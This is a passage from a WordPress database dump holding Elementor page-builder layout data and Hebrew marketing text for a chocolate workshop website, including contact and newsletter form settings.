\\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(329,83,'_elementor_version','0.4'),(330,83,'_elementor_template_type','post'),(336,85,'_wp_page_template','elementor_canvas'),(337,85,'_elementor_edit_mode','builder'),(338,85,'_elementor_data','[{\"id\":\"700950a2\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"20a86e96\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"62b3fe8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f67ac3a\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"1abed8db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"5569e669\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><b>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.\\u00a0<\\/b><\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d6\\u05d4 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05de\\u05d7\\u05d1\\u05e7\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05e2\\u05e8\\u05d1\\u05d1, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05db\\u05dc \\u05e8\\u05d5\\u05d1\\u05d3 \\u05db\\u05d6\\u05d4 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d0\\u05d7\\u05e8 \\u05de\\u05db\\u05df, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05d5. \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d4\\u05db\\u05e0\\u05d4 \\u05d4\\u05de\\u05e9\\u05d5\\u05dc\\u05d1\\u05ea, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05db\\u05e0\\u05ea\\u05dd. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3.\\u00a0<\\/p><h2>\\u05de\\u05d4 \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e9\\u05dc\\u05db\\u05dd?<\\/h2><ul><li>\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d5\\u05ea<\\/li><li>\\u05d2\\u05e0\\u05d0\\u05e9 \\u05de\\u05d3\\u05d4\\u05d9\\u05dd<\\/li><li>\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05e0\\u05e9\\u05d9\\u05e7\\u05d5\\u05ea \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea<\\/li><li>\\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d8\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05dc \\u05d4\\u05d3\\u05e2\\u05d5\\u05ea<\\/li><\\/ul><p>\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05e9\\u05ea\\u05de\\u05e9\\u05d9\\u05dd \\u05d0\\u05da \\u05d5\\u05e8\\u05e7 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05d8\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05e7\\u05d9\\u05d9\\u05de\\u05d9\\u05dd \\u05d1\\u05ea\\u05e2\\u05e9\\u05d9\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05d8\\u05e2\\u05dd. \\u05e1\\u05de\\u05db\\u05d5 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e0\\u05d1\\u05d9\\u05d0 \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea.<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4058fdb2\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"778b3676\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"37eaf375\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61dc30dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"31a67108\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3bf2db\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"5122f9c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"63f9b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61739365\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"377296c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"a673372\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"40017cec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23388368\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover